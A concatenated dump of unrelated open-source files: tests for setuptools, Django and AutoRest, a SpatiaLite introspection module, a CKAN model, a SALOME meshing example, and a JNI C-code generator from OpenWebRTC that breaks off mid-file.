result.template = "object/tangible/hair/bothan/shared_hair_bothan_female_s04.iff"
result.attribute_template_id = -1
result.stfName("hair_name","hair")
#### BEGIN MODIFICATIONS ####
#### END MODIFICATIONS ####
return result
|
margelatu/czl-scrape
|
refs/heads/master
|
scrapy/czlscrape/spiders/__init__.py
|
2415
|
# This package will contain the spiders of your Scrapy project
#
# Please refer to the documentation for information on how to create and manage
# your spiders.
|
drpaneas/linuxed.gr
|
refs/heads/master
|
lib/python2.7/site-packages/setuptools/tests/test_test.py
|
124
|
# -*- coding: UTF-8 -*-
"""develop tests
"""
import os
import shutil
import site
import sys
import tempfile
import unittest
from distutils.errors import DistutilsError
from setuptools.compat import StringIO
from setuptools.command.test import test
from setuptools.command import easy_install as easy_install_pkg
from setuptools.dist import Distribution
SETUP_PY = """\
from setuptools import setup
setup(name='foo',
packages=['name', 'name.space', 'name.space.tests'],
namespace_packages=['name'],
test_suite='name.space.tests.test_suite',
)
"""
NS_INIT = """# -*- coding: Latin-1 -*-
# Söme Arbiträry Ünicode to test Issüé 310
try:
__import__('pkg_resources').declare_namespace(__name__)
except ImportError:
from pkgutil import extend_path
__path__ = extend_path(__path__, __name__)
"""
# Make sure this is Latin-1 binary, before writing:
if sys.version_info < (3,):
NS_INIT = NS_INIT.decode('UTF-8')
NS_INIT = NS_INIT.encode('Latin-1')
TEST_PY = """import unittest
class TestTest(unittest.TestCase):
def test_test(self):
print "Foo" # Should fail under Python 3 unless 2to3 is used
test_suite = unittest.makeSuite(TestTest)
"""
class TestTestTest(unittest.TestCase):
def setUp(self):
if sys.version < "2.6" or hasattr(sys, 'real_prefix'):
return
# Directory structure
self.dir = tempfile.mkdtemp()
os.mkdir(os.path.join(self.dir, 'name'))
os.mkdir(os.path.join(self.dir, 'name', 'space'))
os.mkdir(os.path.join(self.dir, 'name', 'space', 'tests'))
# setup.py
setup = os.path.join(self.dir, 'setup.py')
f = open(setup, 'wt')
f.write(SETUP_PY)
f.close()
self.old_cwd = os.getcwd()
# name/__init__.py
init = os.path.join(self.dir, 'name', '__init__.py')
f = open(init, 'wb')
f.write(NS_INIT)
f.close()
# name/space/__init__.py
init = os.path.join(self.dir, 'name', 'space', '__init__.py')
f = open(init, 'wt')
f.write('#empty\n')
f.close()
# name/space/tests/__init__.py
init = os.path.join(self.dir, 'name', 'space', 'tests', '__init__.py')
f = open(init, 'wt')
f.write(TEST_PY)
f.close()
os.chdir(self.dir)
self.old_base = site.USER_BASE
site.USER_BASE = tempfile.mkdtemp()
self.old_site = site.USER_SITE
site.USER_SITE = tempfile.mkdtemp()
def tearDown(self):
if sys.version < "2.6" or hasattr(sys, 'real_prefix'):
return
os.chdir(self.old_cwd)
shutil.rmtree(self.dir)
shutil.rmtree(site.USER_BASE)
shutil.rmtree(site.USER_SITE)
site.USER_BASE = self.old_base
site.USER_SITE = self.old_site
def test_test(self):
if sys.version < "2.6" or hasattr(sys, 'real_prefix'):
return
dist = Distribution(dict(
name='foo',
packages=['name', 'name.space', 'name.space.tests'],
namespace_packages=['name'],
test_suite='name.space.tests.test_suite',
use_2to3=True,
))
dist.script_name = 'setup.py'
cmd = test(dist)
cmd.user = 1
cmd.ensure_finalized()
cmd.install_dir = site.USER_SITE
cmd.user = 1
old_stdout = sys.stdout
sys.stdout = StringIO()
try:
try: # try/except/finally doesn't work in Python 2.4, so we need nested try-statements.
cmd.run()
except SystemExit: # The test runner calls sys.exit, stop that making an error.
pass
finally:
sys.stdout = old_stdout
|
poiati/django
|
refs/heads/master
|
tests/messages_tests/test_mixins.py
|
281
|
from django.core.urlresolvers import reverse
from django.test import SimpleTestCase, override_settings
from .urls import ContactFormViewWithMsg
@override_settings(ROOT_URLCONF='messages_tests.urls')
class SuccessMessageMixinTests(SimpleTestCase):
def test_set_messages_success(self):
author = {'name': 'John Doe',
'slug': 'success-msg'}
add_url = reverse('add_success_msg')
req = self.client.post(add_url, author)
self.assertIn(ContactFormViewWithMsg.success_message % author,
req.cookies['messages'].value)
|
blueburningcoder/nupic
|
refs/heads/master
|
external/linux32/lib/python2.6/site-packages/matplotlib/numerix/linear_algebra/__init__.py
|
70
|
from matplotlib.numerix import which
if which[0] == "numarray":
from numarray.linear_algebra import *
elif which[0] == "numeric":
from LinearAlgebra import *
elif which[0] == "numpy":
try:
from numpy.oldnumeric.linear_algebra import *
except ImportError:
from numpy.linalg.old import *
else:
raise RuntimeError("invalid numerix selector")
|
redhat-openstack/django
|
refs/heads/epel7-patches
|
django/contrib/gis/db/backends/spatialite/introspection.py
|
221
|
from django.contrib.gis.gdal import OGRGeomType
from django.db.backends.sqlite3.introspection import DatabaseIntrospection, FlexibleFieldLookupDict
from django.utils import six
class GeoFlexibleFieldLookupDict(FlexibleFieldLookupDict):
"""
Sublcass that includes updates the `base_data_types_reverse` dict
for geometry field types.
"""
base_data_types_reverse = FlexibleFieldLookupDict.base_data_types_reverse.copy()
base_data_types_reverse.update(
{'point' : 'GeometryField',
'linestring' : 'GeometryField',
'polygon' : 'GeometryField',
'multipoint' : 'GeometryField',
'multilinestring' : 'GeometryField',
'multipolygon' : 'GeometryField',
'geometrycollection' : 'GeometryField',
})
class SpatiaLiteIntrospection(DatabaseIntrospection):
data_types_reverse = GeoFlexibleFieldLookupDict()
def get_geometry_type(self, table_name, geo_col):
cursor = self.connection.cursor()
try:
# Querying the `geometry_columns` table to get additional metadata.
cursor.execute('SELECT "coord_dimension", "srid", "type" '
'FROM "geometry_columns" '
'WHERE "f_table_name"=%s AND "f_geometry_column"=%s',
(table_name, geo_col))
row = cursor.fetchone()
if not row:
raise Exception('Could not find a geometry column for "%s"."%s"' %
(table_name, geo_col))
# OGRGeomType does not require GDAL and makes it easy to convert
# from OGC geom type name to Django field.
field_type = OGRGeomType(row[2]).django
# Getting any GeometryField keyword arguments that are not the default.
dim = row[0]
srid = row[1]
field_params = {}
if srid != 4326:
field_params['srid'] = srid
if isinstance(dim, six.string_types) and 'Z' in dim:
field_params['dim'] = 3
finally:
cursor.close()
return field_type, field_params
|
datacats/ckanext-featuredviews
|
refs/heads/master
|
ckanext/featuredviews/db.py
|
3
|
import ckan.model as model
from sqlalchemy import Table
from sqlalchemy import Column
from sqlalchemy import types
from ckan.model.meta import metadata, mapper, Session
from ckan.model.types import make_uuid
featured_table = Table('featured', metadata,
Column('resource_view_id', types.UnicodeText, primary_key=True),
Column('package_id', types.UnicodeText),
Column('canonical', types.Boolean),
Column('homepage', types.Boolean)
)
class Featured(model.DomainObject):
@classmethod
def get(cls, **kw):
query = model.Session.query(cls).autoflush(False)
return query.filter_by(**kw).first()
@classmethod
def find(cls, **kw):
query = model.Session.query(cls).autoflush(False)
return query.filter_by(**kw)
model.meta.mapper(Featured, featured_table)
|
FedoraScientific/salome-smesh
|
refs/heads/master
|
doc/salome/examples/defining_hypotheses_ex11.py
|
1
|
# Projection 1D2D
# Project triangles from one meshed face to another mesh on the same box
import salome
salome.salome_init()
import GEOM
from salome.geom import geomBuilder
geompy = geomBuilder.New(salome.myStudy)
import SMESH, SALOMEDS
from salome.smesh import smeshBuilder
smesh = smeshBuilder.New(salome.myStudy)
# Prepare geometry
# Create a box
box = geompy.MakeBoxDXDYDZ(100, 100, 100)
# Get geom faces to mesh with triangles in the 1ts and 2nd meshes
faces = geompy.SubShapeAll(box, geompy.ShapeType["FACE"])
# 2 adjacent faces of the box
Face_1 = faces[2]
Face_2 = faces[0]
geompy.addToStudy( box, 'box' )
geompy.addToStudyInFather( box, Face_1, 'Face_1' )
geompy.addToStudyInFather( box, Face_2, 'Face_2' )
# Make the source mesh with Netgem2D
src_mesh = smesh.Mesh(Face_1, "Source mesh")
src_mesh.Segment().NumberOfSegments(15)
src_mesh.Triangle()
src_mesh.Compute()
# Mesh the target mesh using the algoritm Projection1D2D
tgt_mesh = smesh.Mesh(Face_2, "Target mesh")
tgt_mesh.Projection1D2D().SourceFace(Face_1,src_mesh)
tgt_mesh.Compute()
|
tbombach/autorest
|
refs/heads/master
|
src/generator/AutoRest.Python.Tests/AcceptanceTests/string_tests.py
|
2
|
# coding=utf-8
# --------------------------------------------------------------------------
#
# Copyright (c) Microsoft Corporation. All rights reserved.
#
# The MIT License (MIT)
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the ""Software""), to
# deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
#
# --------------------------------------------------------------------------
import unittest
import subprocess
import sys
import isodate
import tempfile
import json
from datetime import date, datetime, timedelta
import os
from os.path import dirname, pardir, join, realpath, sep, pardir
cwd = dirname(realpath(__file__))
root = realpath(join(cwd , pardir, pardir, pardir, pardir))
sys.path.append(join(root, "src" , "client" , "Python", "msrest"))
log_level = int(os.environ.get('PythonLogLevel', 30))
tests = realpath(join(cwd, pardir, "Expected", "AcceptanceTests"))
sys.path.append(join(tests, "BodyString"))
from msrest.serialization import Deserializer
from msrest.exceptions import DeserializationError, SerializationError
from autorestswaggerbatservice import AutoRestSwaggerBATService
from autorestswaggerbatservice.models.auto_rest_swagger_bat_service_enums import *
class StringTests(unittest.TestCase):
def test_string(self):
client = AutoRestSwaggerBATService(base_url="http://localhost:3000")
self.assertIsNone(client.string.get_null())
client.string.put_null(None)
self.assertEqual("", client.string.get_empty())
client.string.put_empty("")
try:
test_str = (
"\xe5\x95\x8a\xe9\xbd\x84\xe4\xb8\x82\xe7\x8b\x9b\xe7\x8b"
"\x9c\xef\xa7\xb1\xef\xa4\xac\xef\xa7\xb1\xef\xa8\x8c\xef"
"\xa8\xa9\xcb\x8a\xe3\x80\x9e\xe3\x80\xa1\xef\xbf\xa4\xe2"
"\x84\xa1\xe3\x88\xb1\xe2\x80\x90\xe3\x83\xbc\xef\xb9\xa1"
"\xef\xb9\xa2\xef\xb9\xab\xe3\x80\x81\xe3\x80\x93\xe2\x85"
"\xb0\xe2\x85\xb9\xe2\x92\x88\xe2\x82\xac\xe3\x88\xa0\xe3"
"\x88\xa9\xe2\x85\xa0\xe2\x85\xab\xef\xbc\x81\xef\xbf\xa3"
"\xe3\x81\x81\xe3\x82\x93\xe3\x82\xa1\xe3\x83\xb6\xce\x91"
"\xef\xb8\xb4\xd0\x90\xd0\xaf\xd0\xb0\xd1\x8f\xc4\x81\xc9"
"\xa1\xe3\x84\x85\xe3\x84\xa9\xe2\x94\x80\xe2\x95\x8b\xef"
"\xb8\xb5\xef\xb9\x84\xef\xb8\xbb\xef\xb8\xb1\xef\xb8\xb3"
"\xef\xb8\xb4\xe2\x85\xb0\xe2\x85\xb9\xc9\x91\xee\x9f\x87"
"\xc9\xa1\xe3\x80\x87\xe3\x80\xbe\xe2\xbf\xbb\xe2\xba\x81"
"\xee\xa1\x83\xe4\x9c\xa3\xee\xa1\xa4\xe2\x82\xac").decode('utf-8')
except AttributeError:
test_str = (
b"\xe5\x95\x8a\xe9\xbd\x84\xe4\xb8\x82\xe7\x8b\x9b\xe7\x8b"
b"\x9c\xef\xa7\xb1\xef\xa4\xac\xef\xa7\xb1\xef\xa8\x8c\xef"
b"\xa8\xa9\xcb\x8a\xe3\x80\x9e\xe3\x80\xa1\xef\xbf\xa4\xe2"
b"\x84\xa1\xe3\x88\xb1\xe2\x80\x90\xe3\x83\xbc\xef\xb9\xa1"
b"\xef\xb9\xa2\xef\xb9\xab\xe3\x80\x81\xe3\x80\x93\xe2\x85"
b"\xb0\xe2\x85\xb9\xe2\x92\x88\xe2\x82\xac\xe3\x88\xa0\xe3"
b"\x88\xa9\xe2\x85\xa0\xe2\x85\xab\xef\xbc\x81\xef\xbf\xa3"
b"\xe3\x81\x81\xe3\x82\x93\xe3\x82\xa1\xe3\x83\xb6\xce\x91"
b"\xef\xb8\xb4\xd0\x90\xd0\xaf\xd0\xb0\xd1\x8f\xc4\x81\xc9"
b"\xa1\xe3\x84\x85\xe3\x84\xa9\xe2\x94\x80\xe2\x95\x8b\xef"
b"\xb8\xb5\xef\xb9\x84\xef\xb8\xbb\xef\xb8\xb1\xef\xb8\xb3"
b"\xef\xb8\xb4\xe2\x85\xb0\xe2\x85\xb9\xc9\x91\xee\x9f\x87"
b"\xc9\xa1\xe3\x80\x87\xe3\x80\xbe\xe2\xbf\xbb\xe2\xba\x81"
b"\xee\xa1\x83\xe4\x9c\xa3\xee\xa1\xa4\xe2\x82\xac").decode('utf-8')
self.assertEqual(test_str, client.string.get_mbcs())
client.string.put_mbcs(test_str)
test_str = " Now is the time for all good men to come to the aid of their country "
self.assertEqual(test_str, client.string.get_whitespace())
client.string.put_whitespace(test_str)
self.assertIsNone(client.string.get_not_provided())
self.assertEqual(Colors.redcolor, client.enum.get_not_expandable())
client.enum.put_not_expandable('red color')
client.enum.put_not_expandable(Colors.redcolor)
with self.assertRaises(SerializationError):
client.enum.put_not_expandable('not a colour')
self.assertEqual(client.string.get_base64_encoded(), 'a string that gets encoded with base64'.encode())
self.assertEqual(client.string.get_base64_url_encoded(), 'a string that gets encoded with base64url'.encode())
self.assertIsNone(client.string.get_null_base64_url_encoded())
client.string.put_base64_url_encoded('a string that gets encoded with base64url'.encode())
client.enum.put_referenced(Colors.redcolor)
client.enum.put_referenced("red color")
client.enum.put_referenced_constant()
self.assertEqual(client.enum.get_referenced(), Colors.redcolor)
self.assertEqual(client.enum.get_referenced_constant().color_constant, Colors.green_color.value)
if __name__ == '__main__':
unittest.main()
|
stefhak/openwebrtc
|
refs/heads/master
|
bindings/java/c_generator.py
|
31
|
# Copyright (c) 2014-2015, Ericsson AB. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice, this
# list of conditions and the following disclaimer in the documentation and/or other
# materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
# IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
# INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
# NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY
# OF SUCH DAMAGE.
import config
from functools import partial
from collections import defaultdict
from itertools import imap
from java_type_signatures import type_signatures
from base_generator import *
C = BaseGenerator(
default_line_prefix=config.C_INDENTATION,
)
def jni_param(param):
if param.jni_type:
return param.jni_type + ' ' + param.jni_name
return ()
def c_param(param):
if param.c_type:
return param.c_type + ' ' + param.c_name
return ()
def c_arg(param):
if param.c_type:
return param.c_name
return ()
def jni_arg(param):
if param.jni_type:
return param.jni_name
return ()
@add_to(C)
class Log(C.Lines):
def __init__(self, level, msg, *args):
self.msg = msg
self.args = args
self.level = level
def _make_logfunc(level):
@classmethod
def logfunc(cls, msg, *args):
return cls(level, msg, *args)
return logfunc
error = _make_logfunc('error')
warning = _make_logfunc('warning')
debug = _make_logfunc('debug')
info = _make_logfunc('info')
verbose = _make_logfunc('verbose')
def __iter__(self):
yield C.Call('log_' + self.level, quot(self.msg), *self.args)
@add_to(C)
class Assert(C.Lines):
def __init__(self, val):
self.val = val
def __iter__(self):
yield semi('g_assert(' + flatjoin(self.val, '') + ')')
@add_to(C)
class Throw(C.Lines):
def __init__(self, *args):
self.args = args
def __iter__(self):
yield 'THROW(' + flatjoin(self.args, '') + ');'
@add_to(C)
class ExceptionCheck(C.Lines):
def __init__(self, value):
self.value = value
def __iter__(self):
yield C.If(C.Env('ExceptionCheck'),
C.Log('warning', 'exception at %s:%d', '__FILE__', '__LINE__'),
C.Env('ExceptionDescribe'),
C.Return(self.value),
)
@classmethod
def default(cls, value):
return cls(value.parent.return_value.default_value)
@add_to(C)
class CommentHeader(C.Comment):
def __iter__(self):
l = len(self.text)
yield '/**' + l * '*' + '**/'
yield '/* ' + self.text + ' */'
yield '/**' + l * '*' + '**/'
@add_to(C)
class Function(C.FunctionBlock):
modifiers = ['static']
def __init__(self,
name,
return_type='void',
params=None,
**kwargs):
super(Function, self).__init__(**kwargs)
self.name = name
self.return_type = return_type
self.params = params or []
@property
def start(self):
return [self.definition, '{']
@staticmethod
def callback(callback, body=None, **kwargs):
args = {
'return_type': callback.params.return_value.c_type,
'name': 'callback_' + callback.value.gir_type,
'params': map(c_param, callback.params),
'body': [TypeConversions.params_to_jni(callback.params, body=body or [], push_frame=True)],
}
if callback.params.return_value.name is not None:
args['body'] += [C.Return(callback.params.return_value.c_name)]
args.update(kwargs)
return C.Function(**args)
@add_to(C)
class JniExport(C.FunctionBlock):
modifiers = ['JNIEXPORT']
def __init__(self,
package=None,
clazz=None,
subclass=None,
method_name=None,
return_type='void',
params=None,
**kwargs):
super(JniExport, self).__init__(**kwargs)
self.package = package
self.clazz = clazz
self.subclass = subclass
self.method_name = method_name
self.return_type = return_type
self.java_params = params or []
@property
def name(self):
return '_'.join(prune_empty('Java',
self.package.replace('.', '_'),
self.clazz,
self.subclass,
self.method_name,
))
@property
def params(self):
return ['JNIEnv* env'] + self.java_params
@property
def start(self):
return [self.definition, '{']
@staticmethod
def default(function, body=[], **kwargs):
params = map(jni_param, function.params.java_params)
if function.params.instance_param is None:
params = ['jclass jclazz'] + params
else:
params = [jni_param(function.params.instance_param)] + params
args = {
'return_type': function.params.return_value.jni_type,
'method_name': function.name,
'params': params,
'body': [C.TypeConversions.params_to_c(function.params, body=body, get_env=False)],
}
if function.params.return_value.name is not None:
args['body'] += [C.Return(function.params.return_value.jni_name)]
args.update(kwargs)
return JniExport(**args)
@add_to(C)
class Helper(C.Call):
helper_functions = {}
used_helpers = []
def __init__(self, name, *args):
super(Helper, self).__init__(name, *args)
func = self.helper_functions.pop(name, None)
if func is not None:
self.used_helpers.append(func)
@classmethod
def add_helper(cls, name, func):
cls.helper_functions[name] = func
@classmethod
def enumerate_used_helpers(cls):
return cls.used_helpers
@add_to(C)
class Cache(C.Lines):
cached_classes = defaultdict(partial(defaultdict, dict))
def __init__(self, *args):
self.args = list(args)
def __iter__(self):
yield 'cache_' + flatjoin(self.args, '_')
@classmethod
def clazz(cls, *args):
classname = flatjoin(args, '$')
cls.cached_classes[type_signatures[classname]['_path']]
return cls(*args)
def _make_cacher(func):
@classmethod
def cacher(cls, *args):
methodname = args[-1]
signatures = type_signatures[flatjoin(args[:-1], '$')]
cls.cached_classes[signatures['_path']][func][methodname] = signatures[methodname]
return cls(*args)
return cacher
method = _make_cacher('GetMethodID')
static_method = _make_cacher('GetStaticMethodID')
field = _make_cacher('GetFieldID')
static_field = _make_cacher('GetStaticFieldID')
@classmethod
def default_class(cls, clazz):
cls.cached_classes[clazz.java_class_path]
return cls(clazz.java_type)
@classmethod
def default_method(cls, func):
val = func.value
args = None
if hasattr(val, 'outer_java_type'):
args = [val.outer_java_type, val.java_type, func.name]
else:
args = [val.java_type, func.name]
cls.cached_classes[val.java_class_path]['GetMethodID'][func.name] = func.method_signature
return cls(*args)
@classmethod
def default_enum_member(cls, enum, member):
typ = enum.type
if hasattr(enum.type, 'inner_type'):
typ = enum.type.inner_type
cls.cached_classes[typ.java_class_path]['GetStaticFieldID'][member.name] = typ.java_signature
return cls(enum.name, member.name)
@classmethod
def enumerate_cached_classes(cls):
cache_declarations = []
jni_onload_cache = []
for classpath, clazz in Cache.cached_classes.items():
classname = classpath[classpath.rfind('/')+1:]
to_cache_var = lambda *args: '_'.join(['cache'] + classname.split('$') + list(args))
classvar = to_cache_var()
cache_declarations += [C.Decl('static jclass', classvar)]
jni_onload_cache += [
C.Assign(classvar, C.Env('FindClass', quot(classpath))),
C.ExceptionCheck('0'),
C.Assign(classvar, C.Env('NewGlobalRef', classvar)),
C.ExceptionCheck('0'),
]
for getfunc, method in clazz.items():
var_type = 'jmethodID' if 'Method' in getfunc else 'jfieldID'
for methodname, signature in method.items():
methodvar = to_cache_var(methodname)
if methodname == '_constructor':
methodname = '<init>'
cache_declarations += [C.Decl('static ' + var_type, methodvar)]
jni_onload_cache += [
C.Log('debug', 'getting %s.%s', quot(classname), quot(methodname)),
C.Assign(methodvar, C.Env(getfunc, classvar, quot(methodname), quot(signature))),
C.ExceptionCheck('0'),
]
cache_declarations.append('')
jni_onload_cache.append('')
return cache_declarations[:-1], jni_onload_cache[:-1]
@add_to(C)
class Env(C.Lines):
return_type_table = {
'V': 'Void',
';': 'Object',
'Z': 'Boolean',
'B': 'Byte',
'C': 'Char',
'S': 'Short',
'I': 'Int',
'J': 'Long',
'F': 'Float',
'D': 'Double',
}
def __init__(self, name, *args):
self.name = name
self.args = args
@staticmethod
def tuple_to_type(args):
clazz = type_signatures[flatjoin(args[:-1], '$')]
method = clazz[args[-1]]
return Env.return_type_table[method[-1]]
@classmethod
def method(cls, name, method_tuple, *args):
return cls('Call' + Env.tuple_to_type(method_tuple) + 'Method', name, C.Cache.method(*method_tuple), *args)
@classmethod
def static_method(cls, method_tuple, *args):
return cls('CallStatic' + Env.tuple_to_type(method_tuple) + 'Method', C.Cache.clazz(method_tuple[:-1]), C.Cache.static_method(*method_tuple), *args)
@classmethod
def field(cls, name, field_tuple):
return cls('Get' + Env.tuple_to_type(field_tuple) + 'Field', name, C.Cache.field(*field_tuple))
@classmethod
def new(cls, clazz, *args):
return cls('NewObject', C.Cache.clazz(clazz), C.Cache.method(clazz, '_constructor'), *args)
@classmethod
def throw(cls, clazz, msg):
return cls('ThrowNew', C.Cache.clazz(clazz), msg)
@classmethod
def callback(cls, callback):
type = Env.return_type_table[callback.params.return_value.java_signature[-1]]
cached = None
if hasattr(callback.value, 'outer_java_type'):
cached = (callback.value.outer_java_type, callback.value.java_type, callback.name)
else:
cached = (callback.value.java_type, callback.name)
return cls('Call' + type + 'Method',
map(jni_arg, callback.params.closure_params),
C.Cache.default_method(callback),
*map(jni_arg, callback.params.java_params)
)
def __iter__(self):
yield semi('(*env)->{name}({args})'.format(
name=self.name,
args=flatjoin(['env'] + list(flatten(self.args)), ', '),
))
@add_to(C)
class TypeConversions(C.Lines):
def __init__(self, conversions, return_conversion, body=None, get_env=True, push_frame=False, **kwargs):
super(TypeConversions, self).__init__(**kwargs)
self.conversions = list(conversions)
self.return_conversion = return_conversion
self.body = body or []
self.get_env = get_env
self.push_frame = push_frame
def __iter__(self):
conversion = [
prune_empty([p.declarations for p in self.conversions] + [self.get_env and C.Decl('JNIEnv*', 'env')]),
self.get_env and C.Assign('env', C.Call('get_jni_env')),
C.If(Env('PushLocalFrame', str(config.LOCAL_FRAME_SIZE)),
C.Log('warning', 'failed to push local frame at %s:%d', '__FILE__', '__LINE__')
) if self.push_frame else [],
prune_empty([p.conversion for p in self.conversions]),
self.body,
prune_empty(p.cleanup for p in reversed(self.conversions)),
Env('PopLocalFrame', 'NULL') if self.push_frame else [],
]
if self.return_conversion is not None:
conversion = [self.return_conversion.declarations] + conversion + [
self.return_conversion.conversion, self.return_conversion.cleanup,
]
return iter(intersperse(prune_empty(conversion), ''))
@staticmethod
def params_to_c(params, **kwargs):
ret = params.return_value
return TypeConversions([param.transform_to_c() for param in params],
ret.transform_to_jni() if ret.name is not None else None, **kwargs)
@staticmethod
def params_to_jni(params, **kwargs):
ret = params.return_value
return TypeConversions([param.transform_to_jni() for param in params],
ret.transform_to_c() if ret.name is not None else None, **kwargs)
def make_function_gen(package, classname):
def gen(function):
call = C.Call(function.c_name, map(c_arg, function.params))
ret = function.params.return_value
if ret.name is not None:
call = C.Assign(ret.c_name, call)
out = JniExport.default(function, package=package, clazz=classname, body=call)
if ret.name is not None:
out.body = [C.Decl(ret.c_type, ret.c_name)] + out.body
return out
return gen
def make_callback_gen(package, classname):
def gen(callback):
call = C.Env.callback(callback)
ret = callback.params.return_value
if ret.name is not None:
call = C.Assign(ret.jni_name, call)
out = C.Function.callback(callback, package=package, clazz=classname, body=call)
if ret.name is not None:
out.body = [C.Decl(ret.jni_type, ret.jni_name)] + out.body
return out
return gen
def make_signal_accessors_gen(package, classname):
def gen(signal):
connect_args = map(c_arg, signal.add_listener.params)
connect_args[0] = 'G_OBJECT(' + connect_args[0] + ')'
connect_args.insert(1, quot(signal.signal_name))
connect_args += [C.Helper('jobject_wrapper_closure_notify').name, '0']
ret = signal.add_listener.params.return_value
connecter = C.JniExport.default(signal.add_listener, package=package, clazz=classname,
body=[C.Assign(ret.c_name, C.Call('g_signal_connect_data', connect_args))],
)
connecter.body = [C.Decl(ret.c_type, ret.c_name)] + connecter.body
disconnect_args = map(c_arg, signal.remove_listener.params)
disconnect_args[0] = 'G_OBJECT(' + disconnect_args[0] + ')'
disconnecter = C.JniExport.default(signal.remove_listener, package=package, clazz=classname,
body=C.Call('g_signal_handler_disconnect', disconnect_args),
)
return [connecter, disconnecter]
return gen
def gen_class(package, clazz):
body = [C.CommentHeader(clazz.name)]
gen_signal_accessors = make_signal_accessors_gen(package, clazz.name)
for attr in ['constructors', 'functions', 'methods']:
body += [C.Comment(attr) if getattr(clazz, attr) else None]
body += map(make_function_gen(package, clazz.name), getattr(clazz, attr))
for interface in clazz.interfaces:
body += map(make_function_gen(package, clazz.name), interface.methods)
body += [C.Comment('signals') if clazz.signals else None]
body += map(make_callback_gen(package, clazz.name), clazz.signals)
body += map(gen_signal_accessors, clazz.signals)
body += [C.Comment('properties') if clazz.properties else None]
for prop in clazz.properties:
body += [C.Comment(prop.name)]
if prop.readable:
# getter
ret = prop.getter.params.return_value
get_params = map(c_arg, prop.getter.params) + [quot(prop.name), '&' + ret.c_name, 'NULL']
func = C.JniExport.default(prop.getter, package=package, clazz=clazz.name, body=[
C.Call('g_object_get', get_params),
])
if ret.name is not None:
func.body = [C.Decl(ret.c_type, ret.c_name)] + func.body
body.append(func)
# change listener
transform = ret.transform_to_jni()
func = C.Function(
package=package,
clazz=clazz.name,
name='callback_' + prop.signal.value.gir_type,
return_type=prop.signal.params.return_value.c_type,
params=map(c_param, prop.signal.params),
body=[TypeConversions([p.transform_to_jni() for p in prop.signal.params.params], None, push_frame=True, body=[
'(void) c_pspec;',
C.Call('g_object_get', get_params),
transform.conversion,
C.Env.callback(prop.signal),
transform.cleanup,
])],
)
func.body = [
C.Decl(ret.c_type, ret.c_name),
transform.declarations,
] + func.body
body.append(func)
body += gen_signal_accessors(prop.signal)
if prop.writable:
# setter
ret = prop.setter.params.return_value
params = map(c_arg, prop.setter.params)
params.insert(1, quot(prop.name))
params.append('NULL')
func = C.JniExport.default(prop.setter, package=package, clazz=clazz.name, body=[
C.Call('g_object_set', params)
])
body += [func]
return intersperse(prune_empty(body), '')
def gen_namespace(namespace, package):
body = []
package = package + '.' + namespace.symbol_prefix
body += map(make_callback_gen(package, namespace.identifier_prefix), namespace.callbacks)
body += map(make_function_gen(package, namespace.identifier_prefix), namespace.functions)
body += map(partial(gen_class, package), namespace.classes)
return body
def add_helpers(namespace):
for enum in namespace.enums:
C.Helper.add_helper(enum.name + '_to_java_enum',
C.Function(enum.name + '_to_java_enum',
return_type='jobject',
params=['JNIEnv* env', enum.type.c_type + ' value'],
body=[
C.Decl('jfieldID', 'fieldId'),
C.Decl('jobject', 'result'),
'',
C.Switch('value', cases=[
(member.c_name, C.Assign('fieldId', C.Cache.default_enum_member(enum, member)))
for member in enum.members
]),
'',
C.Assert('fieldId'),
C.Assign('result', Env('GetStaticObjectField', C.Cache(enum.name), 'fieldId')),
C.ExceptionCheck('NULL'),
C.Return('result'),
]
)
)
def gen_source(namespaces, include_headers):
body = []
package = config.PACKAGE_ROOT
for namespace in namespaces:
add_helpers(namespace)
for namespace in namespaces:
body += gen_namespace(namespace, package)
jobject_wrapper_struct = C.Block(
_start = 'typedef union {',
body = [
C.Decl('jobject', 'obj'),
C.Decl('jweak', 'weak'),
],
_end = '} JObjectWrapper;',
)
jobject_callback_wrapper_struct = C.Block(
_start = 'typedef struct {',
body = [
C.Decl('JObjectWrapper', '*wrapper'),
C.Decl('gboolean', 'should_destroy'),
],
_end = '} JObjectCallbackWrapper;',
)
native_destructor = [C.JniExport(
package=package,
clazz='NativeInstance',
method_name='nativeDestructor',
return_type='void',
params=['jclass clazz', 'jlong instance_pointer'],
body=[
C.Decl('GWeakRef*', 'ref'),
C.Decl('GObject*', 'gobj'),
C.Decl('JObjectWrapper*', 'wrapper'),
'(void) clazz;',
'',
